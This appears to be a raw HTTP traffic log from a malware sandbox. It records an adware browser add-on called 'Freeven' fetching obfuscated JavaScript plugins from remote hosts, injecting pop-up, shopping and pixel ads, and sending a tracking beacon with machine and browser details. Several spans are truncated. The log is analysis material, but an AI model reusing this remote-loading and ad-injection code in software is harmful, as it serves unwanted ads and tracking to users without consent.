MxYTQ1NWI1ODQ2MDMxMzExMWU0YjU5NDgwMjFjMGEwODA2MDYwNjE0NWIwNjRmMTkwZjBh
MGEwNDA3MTkxMjQ5MGYxZDEwNDQxNDEwMGM1ZTFlNTc1ODQwNTYwOTAyNGEzMTJlMzUzNT
JlMmIzNzM5MmUyMTJiMjMyOTIyMzkyYzIxMjUyMzIwMmEyZTI1MzIyMzI3MmQyZjM4M2E0
MTFkNTgwZDEyNDcxNDAyMDM1ODVjNDM0ZjUyNDcxZDFjMWY1YTNhMzEzMjI0MjgzMjJiMz
YyMjIzMjAzYzJlMzczNzMxMjcyYTJhMmEyMDMxMmU1NDRiNmI3MTQ2MDMxMzExMWUwMjIz
MTUwZDVhNWU0YjQ1MGQxYTA1MDYxNDViNTc0YjA4MDMwYjBkMTAxNTBmMDQ1NTA1NDUwNj
BlMGYxYzE3MGUwOTFjNGEwNTAyMTE0MTAyMDMwNTRlMTA1NDUyNWY1NzBjMTQ1OTM4M2Uz
YjM2MjQzNDM2M2MzODMyMjIzMzI3MjEzMzMzMjAyMDM1MzMyMzNlMmIzMTI5MzgyYzJhMm
UyOTQ4MGQ1NjBlMTg1ODE1MDcxNTRiNTU1MzQxNTE0ZDAyMWQxYTRjMjkzODIyMmEyYjM4
MzQzNzI3MzUzMzM1M2UzOTM0M2IzODJiMmYzYzMzMzgzZTVhNDg2MTZlNDcxZTFkMDMwMD
A4MTYyZDBmNDU1ZjRlNDI0ZjU3NmIwNQ==', 'vgaxdkgenq'); }....
GET /plugins/mins/281.js?ver=3&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1423758037"
Last-Modified: Thu, 12 Feb 2015 16:20:37 GMT
Cache-Control: max-age=900
Content-Length: 455
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668152.dop003.fr7.t,1427668152.cds021.fr7.cif (typeof setup2 === 'function') { setup2('MGE2YjdhNWIwMDE3MTAxMTJkMT
ExZDQzNDk1OTRhMGIxMDE1MDg1OTVlNGUxMDE1MDMwNzAxMDAxNDEwNWYwMjFjMTQ0NzAy
MDAzMjFkMTEwNzA0NWMxZTBkMTczMDAwMWY1YzAxMDgxNzQ0NTk1MjU0NTM0OTQ1MTIwOD
E3NDQzNzNjMjczMzM3MzAyMjMzM2EzZDJkMzEzYjI0MjAzNzM0MmYzNzNjMmMzYzM3MzQz
YTNjMzgyNTJjMjY0ZTAyMTQxMTM2MDIxYzA0NGUyNjM3MjAzNjJlMmIzMDIzMjgzNzNjM2
EzYzI1MzEyODNjM2YyMDNlM2MzNzNjNDY0ZDcyNmE1MzExMWYwYzBmMGEwYTI4MWM0MTRi
NDE0MTQxNTk2OTE5', 'qasyhcdaxc'); }....
GET /plugins/mins/260.js?ver=4&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405263875"
Last-Modified: Sun, 13 Jul 2014 15:04:35 GMT
Cache-Control: max-age=900
Content-Length: 823
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds034.fr7.cif (typeof setup2 === 'function') { setup2('MGI3MDdiNTQwZDAwMTYxZjNkMW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', 'pzrvetbohm'); }....
GET /plugins/mins/288.js?ver=4&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426880306"
Last-Modified: Fri, 20 Mar 2015 19:38:26 GMT
Cache-Control: max-age=900
Content-Length: 963
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds021.fr7.cif (typeof setup2 === 'function') { setup2('MWU2NzVhNWE1NDQ1NTMxYjE5MT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', 'emzzteqsmc'); }....
GET /plugins/mins/233.js?ver=7&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1408273128"
Last-Modified: Sun, 17 Aug 2014 10:58:48 GMT
Cache-Control: max-age=900
Content-Length: 867
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds022.fr7.cif (typeof setup2 === 'function') { setup2('MDE2NzdiNGMxZDEwMTIxZTM2MD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', 'zmrnudfncu'); }....
GET /plugins/javascripts/monetization/geo/set_campaign_id_m.js?ver=5&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405929866"
Last-Modified: Mon, 21 Jul 2014 08:04:26 GMT
Cache-Control: max-age=142
Content-Length: 508
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds026.fr7.cappAPI.internal.monetization = appAPI.internal.monetization || {};.if
(typeof appAPI.internal.monetization.plugins === "undefined") { appAPI
.internal.monetization.plugins = {}; }..appAPI.internal.monetization.p
lugins[226] = function() {..if (appAPI.internal.monetization.loader &&
appAPI.internal.monetization.loader.setCampaignId && appAPI.internal.
monetization.getCampaignId) {...if (appAPI.internal.monetization.getCa
mpaignId() == 0) {....appAPI.internal.monetization.loader.setCampaignI
d(1026);...}..}.};....
GET /plugins/mins/221.js?ver=4&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1404650838"
Last-Modified: Sun, 06 Jul 2014 12:47:18 GMT
Cache-Control: max-age=900
Content-Length: 413
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds015.fr7.cappAPI.internal.monetization=appAPI.internal.monetization||{};if(typeo
f appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.
monetization.plugins={};}appAPI.internal.monetization.plugins[221]=fun
ction(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetizati
on.shouldRunByVertical(221,["pops"])){return;}new (appAPI.internal.mon
etization.plugins.ICMBaseManager({namespace:"DOWNLOADS"}))();};
....
GET /plugins/mins/195.js?ver=28&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1404650834"
Last-Modified: Sun, 06 Jul 2014 12:47:14 GMT
Cache-Control: max-age=900
Content-Length: 408
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds008.fr7.cappAPI.internal.monetization=appAPI.internal.monetization||{};if(typeo
f appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.
monetization.plugins={};}appAPI.internal.monetization.plugins[195]=fun
ction(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetizati
on.shouldRunByVertical(195,["pops"])){return;}new (appAPI.internal.mon
etization.plugins.ICMBaseManager({namespace:"LITE"}))();};....
GET /plugins/mins/7.js?ver=2&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1402409611"
Last-Modified: Tue, 10 Jun 2014 14:13:31 GMT
Cache-Control: max-age=900
Content-Length: 683
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668153.cds037.fr7.cappAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[
a]=b;},removeHook:function(a){delete this.hooks[a];},register:function
(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this
.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hook
s[b])))(a):null;},getClass:(function(a){return function(){return{liste
ners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});}
,removeListener:function(c,d){var b=[];a.each(this.listeners,function(
e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent
:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.nam
e){e.fn.call(this,c);}},this));}};};}($jquery_171))};....
GET /plugins/mins/193.js?ver=9&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1408273131"
Last-Modified: Sun, 17 Aug 2014 10:58:51 GMT
Cache-Control: max-age=900
Content-Length: 867
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds008.fr7.cif (typeof setup2 === 'function') { setup2('MWQ2MjdhNDMwMzBlMTIwMDM4MD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', 'fhsakzfpmp'); }....
GET /plugins/mins/180.js?ver=12&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405846499"
Last-Modified: Sun, 20 Jul 2014 08:54:59 GMT
Cache-Control: max-age=900
Content-Length: 1383
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds020.fr7.cif (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMT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', 'njlgrmongb'); }....<<< skipped >>>
GET /plugins/mins/91.js?ver=135&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1427097623"
Last-Modified: Mon, 23 Mar 2015 08:00:23 GMT
Cache-Control: max-age=492
Content-Length: 187756
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds012.fr7.c(function(M){window.__loaderIsRunning__=false;var A=[].slice;var z={};
var a=function(at){if(typeof at=="string"&&typeof at.trim=="function")
{return at.trim();}return at==null?"":at.toString().replace(/^\s /,"")
.replace(/\s $/,"");};function f(at){var au=z[at]={},av,aw;at=at.split
(/\s /);for(av=0,aw=at.length;av<aw;av ){au[at[av]]=true;}return a
u;}var H=function(at,au){var aw=[];for(var av=0;av<at.length;av ){
if(av in at){var ax=au(at[av],av,at);if(ax!=null){aw.push(ax);}}}retur
n aw;};var ad=function(aw,az,av){var au,ax=0,ay=aw.length,at=ay===unde
fined||appAPI.utils.isFunction(aw);if(av){if(at){for(au in aw){if(az.a
pply(aw[au],av)===false){break;}}}else{for(;ax<ay;){if(az.apply(aw[
ax ],av)===false){break;}}}}else{if(at){for(au in aw){if(az.call(aw[a
u],au,aw[au])===false){break;}}}else{for(;ax<ay;){if(az.call(aw[ax]
,ax,aw[ax ])===false){break;}}}}return aw;};var J=function(av){av=av?
(z[av]||f(av)):{};var aA=[],aB=[],aw,ax,au,ay,az,aD=function(aE){var a
F,aI,aH,aG,aJ;for(aF=0,aI=aE.length;aF<aI;aF ){aH=aE[aF];aG=appAPI
.utils.isArray(aH)?"array":(appAPI.utils.isFunction(aH)?"function":"")
;if(aG==="array"){aD(aH);}else{if(aG==="function"){if(!av.unique||!aC.
has(aH)){aA.push(aH);}}}}},at=function(aF,aE){aE=aE||[];aw=!av.memory|
|[aF,aE];ax=true;az=au||0;au=0;ay=aA.length;for(;aA&&az<ay;az ){if
(aA[az].apply(aF,aE)===false&&av.stopOnFalse){aw=true;break;}}ax=false
;if(aA){if(!av.once){if(aB&&aB.length){aw=aB.shift();aC.fireWith(aw[0]
,aw[1]);}}else{if(aw===true){aC.disable();}else{aA=[];}}}},aC={add<<< skipped >>>
GET /plugins/mins/345.js?ver=13&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426517806"
Last-Modified: Mon, 16 Mar 2015 14:56:46 GMT
Cache-Control: max-age=900
Content-Length: 645
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds012.fr7.c__INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,
170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,26
4,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344,363,
368,372,374,379,387,388,393],pops:[108,127,155,170,179,190,195,197,208
,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,3
41,343,346,347,356,357,358,390],intext:[103,117,123,142,259,263,342,35
9,360,391],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200
,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,2
88,290,295,301,304,307,308,311,317,325,327,328,335,350,351,369,370,371
,375,385,389]};....
GET /plugins/mins/253.js?ver=2&rnd=6500 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1417718237"
Last-Modified: Thu, 04 Dec 2014 18:37:17 GMT
Cache-Control: max-age=900
Content-Length: 735
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668153.cds026.fr7.cif (typeof setup2 === 'function') { setup2('MGU2MDdmNDgwNTEyMTUxYjM0MT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', 'ujvjmfakaj'); }....
GET /plugins/javascripts/jquery-1_7_1_min.js?ver=5&rnd=6500 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1407922596"
Last-Modified: Wed, 13 Aug 2014 09:36:36 GMT
Cache-Control: max-age=805
Content-Length: 94779
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668153.cds026.fr7.cvar jQuery = $jquery_171 = $jquery = null;..if (document && typeof doc
ument.getElementById !== "undefined") {../*! jQuery v1.7.1 jquery.com
| jquery.org/license */.(function(a,b){function cy(a){return f.isWindo
w(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){
if(!ck[a]){var b=c.body,d=f("<" a ">").appendTo(b),e=d.css("disp
lay");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("ifram
e"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl
.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.w
rite((c.compatMode==="CSS1Compat"?"<!doctype html>":"") "<htm
l><body>"),cm.close();d=cm.createElement(a),cm.body.appendChi
ld(d),e=f.css(d,"display"),b.removeChild(cl)}ck[a]=e}return ck[a]}func
tion cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),functio
n(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(c
t,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject("M
icrosoft.XMLHTTP")}catch(b){}}function ci(){try{return new a.XMLHttpRe
quest}catch(b){}}function cc(a,c){a.dataFilter&&(c=a.dataFilter(c,a.da
taType));var d=a.dataTypes,e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(
g=1;g<i;g ){if(g===1)for(h in a.converters)typeof h=="string"&&(e[
h.toLowerCase()]=a.converters[h]);l=k,k=d[g];if(k==="*")k=l;else if(l!
=="*"&&l!==k){m=l " " k,n=e[m]||e["* " k];if(!n){p=b;for(o in e){j=o.s
plit(" ");if(j[0]===l||j[0]==="*"){p=e[j[1] " " k];if(p){o=e[o],o===!0
?n=p:p===!0&&(n=o);break}}}}!n&&!p&&f.error("No conversion from "<<< skipped >>>
GET /apps.gif?action=update&app=54248&bic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&ver=1_34_05_04&installtime=1427668122&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001360&subid=0&zdata=0&appver=111&bgver=1&pluginsver=103&curtime=1427668154&lifetime=32&oldappver=22&oldbgver=1&oldpluginsver=17&rnd=270 HTTP/1.1
Accept: */*
Host: stats.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 0MDsJw0wieJKNphn6oEhWe3FuJFCpMROJRepge/i3uG2VsN/u5mYBOAnPcwYVkAvpHrXcXsSUi0=
x-amz-request-id: 8DB28FFF27574AB6
Date: Sun, 29 Mar 2015 22:29:15 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Mon, 24 Feb 2014 23:56:30 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;..
GET /plugin/apps/54248/manifest/1_34_05_04/ie6/manifest.xml?ver=22&rnd=677 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:10 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1427642855"
Last-Modified: Sun, 29 Mar 2015 15:27:35 GMT
Cache-Control: max-age=900
Content-Length: 1708
Content-Type: text/xml; charset=UTF-8
X-HW: 1427668151.dop005.fr7.t,1427668150.cds020.fr7.e<?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>. <V
er>111</Ver>. <ShortName>Freeven pro</ShortName>
. <Description>Feven Shopping Companion</Description>. &
lt;PublisherName>Freeven</PublisherName>. <HomePageLink&g
t;NA</HomePageLink>. <JSLink>hXXp://js.ourstatsstaticstac
k.com/plugin/apps/54248/js/na/ie/app_code.js</JSLink>. <Grou
pID>0</GroupID>. <Domain>NA</Domain>. <RunIn
Iframe>false</RunInIframe>. <ThanksURL>NA</ThanksUR
L>. <EmailSignature>NA</EmailSignature>. <Settings
URL>NA</SettingsURL>. <CertifiedInstall>NA</Certifi
edInstall>. <ExposeSites>NA</ExposeSites>. <Remote
FBApiURL>NA</RemoteFBApiURL>. <DisableIE>true</Disa
bleIE>. <DisableFF>true</DisableFF>. <EnableSearch
IE>false</EnableSearchIE>. <EnableSearchFF>false</E
nableSearchFF>. <AddressbarIE>NA</AddressbarIE>. <
AddressbarFF>NA</AddressbarFF>. <AddressbarFFEnhanced>
NA</AddressbarFFEnhanced>. <AddressbarCR>NA</Addressba
rCR>. <NewTabURL>NA</NewTabURL>. <NewTabEmbed>N
A</NewTabEmbed>. <OpenSearchURL>NA</OpenSearchURL>.
<BackgroundJS>hXXp://js.ourstatsstaticstack.com/plugin/apps/54
248/bg/na/ie/bg_code.js</BackgroundJS>. <BackgroundVer>1&
lt;/BackgroundVer>. <Manifest>NA</Manifest>. <<<< skipped >>>
GET /plugin/apps/54248/js/na/ie/app_code.js?ver=111&rnd=2816 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1427498129"
Last-Modified: Fri, 27 Mar 2015 23:15:29 GMT
Cache-Control: max-age=900
Content-Length: 3
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668151.dop002.fr7.t,1427668152.cds032.fr7.pr.......
GET /plugin/apps/54248/plugins/na/ie/plugins.json?ver=103&rnd=9831 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1427498130"
Last-Modified: Fri, 27 Mar 2015 23:15:30 GMT
Cache-Control: max-age=900
Content-Length: 17425
Content-Type: text/plain; charset=UTF-8
X-HW: 1427668152.dop002.fr7.t,1427668152.cds006.fr7.pr
{.."plugins_version": 103,.."plugins_list":. [. {"id":4,"url":
"hXXp://js.ourstatsstaticstack.com/plugins/javascripts/jquery-1_7_1_mi
n.js","ver":5,"name":"jquery_1_7_1","browsers":{"ie":true,"ff":true,"c
h":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at":1,"order":
10200},{"run_at":0,"order":100},{"run_at":5,"order":100},{"run_at":2,"
order":10200}],"enabled":true},{"id":2,"url":"hXXp://js.ourstatsstatic
stack.com/plugins/mins/2.js","ver":2,"name":"ie8_fix_1","browsers":{"i
e":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targe
ts":[{"run_at":1,"order":10100},{"run_at":2,"order":10100}],"enabled":
true},{"id":3,"url":"hXXp://js.ourstatsstaticstack.com/plugins/mins/3.
js","ver":2,"name":"ie8_fix_2","browsers":{"ie":true,"ff":false,"ch":f
alse,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":
10300},{"run_at":2,"order":10300}],"enabled":true},{"id":47,"url":"htt
p://js.ourstatsstaticstack.com/plugins/mins/47.js","ver":3,"name":"res
ources_background","browsers":{"ie":true,"ff":true,"ch":true,"sf":true
,"nv":false,"px":false},"targets":[{"run_at":0,"order":30000},{"run_at
":5,"order":30000}],"enabled":true},{"id":246,"url":"hXXp://js.ourstat
sstaticstack.com/plugins/mins/246.js","ver":17,"name":"setup","browser
s":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targ
ets":[{"run_at":0,"order":5},{"run_at":1,"order":5}],"enabled":true},{
"id":253,"url":"hXXp://js.ourstatsstaticstack.com/plugins/mins/253.js"
,"ver":2,"name":"pixel_inject","browsers":{"ie":true,"ff":true,"ch<<< skipped >>>
GET /plugins/mins/42.js?ver=10&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1409568411"
Last-Modified: Mon, 01 Sep 2014 10:46:51 GMT
Cache-Control: max-age=185
Content-Length: 7866
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668152.dop002.fr7.t,1427668152.cds034.fr7.c
var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof
appAPI==="undefined"){appAPI={};}appAPI.__should_activate_validation__
=true;(function(a){if(typeof window=="undefined"){window={};}if(typeof
window.document==="undefined"){window.document={};document=window.doc
ument;}if(typeof window.alert==="undefined"){window.alert=function(b){
var c;if(typeof b==="undefined"){c="undefined";}else{if(b===null){c="n
ull";}else{c=b.toString();}}if(typeof c==="string"){a.alert(c);}};aler
t=window.alert;}})(appAPIinternal);if(typeof console==="undefined"){wi
ndow.console={};console=window.console;}if(typeof console.log==="undef
ined"){window.console.log=function(a){};console.log=window.console.log
;}if(typeof console.info==="undefined"){window.console.info=function(a
){};console.info=window.console.info;}if(typeof console.warn==="undefi
ned"){window.console.warn=function(a){};console.warn=window.console.wa
rn;}if(typeof console.error==="undefined"){window.console.error=functi
on(a){};console.error=window.console.error;}if(typeof console.assert==
="undefined"){window.console.assert=function(a){};console.assert=windo
w.console.assert;}if(typeof console.dir==="undefined"){window.console.
dir=function(a){};console.dir=window.console.dir;}if(typeof console.cl
ear==="undefined"){window.console.clear=function(a){};console.clear=wi
ndow.console.clear;}if(typeof console.profile==="undefined"){window.co
nsole.profile=function(a){};console.profile=window.console.profile;}if
(typeof console.profileEnd==="undefined"){window.console.profileEn<<< skipped >>>
GET /plugins/mins/391.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426068985"
Last-Modified: Wed, 11 Mar 2015 10:16:25 GMT
Cache-Control: max-age=900
Content-Length: 795
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668152.dop002.fr7.t,1427668152.cds025.fr7.c
if (typeof setup2 === 'function') { setup2('<<< skipped >>>', 'bihkugxhrq'); }
GET /plugins/mins/380.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1424181436"
Last-Modified: Tue, 17 Feb 2015 13:57:16 GMT
Cache-Control: max-age=900
Content-Length: 1303
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668152.dop002.fr7.t,1427668152.cds022.fr7.c
if (typeof setup2 === 'function') { setup2('<<< skipped >>>', 'ayqeicjfxx'); }
<<< skipped >>>
GET /plugins/mins/334.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1415748965"
Last-Modified: Tue, 11 Nov 2014 23:36:05 GMT
Cache-Control: max-age=900
Content-Length: 967
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668152.cds005.fr7.c
if (typeof setup2 === 'function') { setup2('<<< skipped >>>', 'bcjwyltdck'); }
GET /plugins/mins/273.js?ver=6&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1418314330"
Last-Modified: Thu, 11 Dec 2014 16:12:10 GMT
Cache-Control: max-age=900
Content-Length: 903
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668152.cds029.fr7.c
if (typeof setup2 === 'function') { setup2('<<< skipped >>>', 'atqblkodft'); }
GET /plugins/mins/242.js?ver=4&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1403211500"
Last-Modified: Thu, 19 Jun 2014 20:58:20 GMT
Cache-Control: max-age=900
Content-Length: 1023
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668152.cds009.fr7.c
if (typeof setup2 === 'function') { setup2('<<< skipped >>>', 'fuetdjnmfc'); }
GET /plugins/mins/230.js?ver=7&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
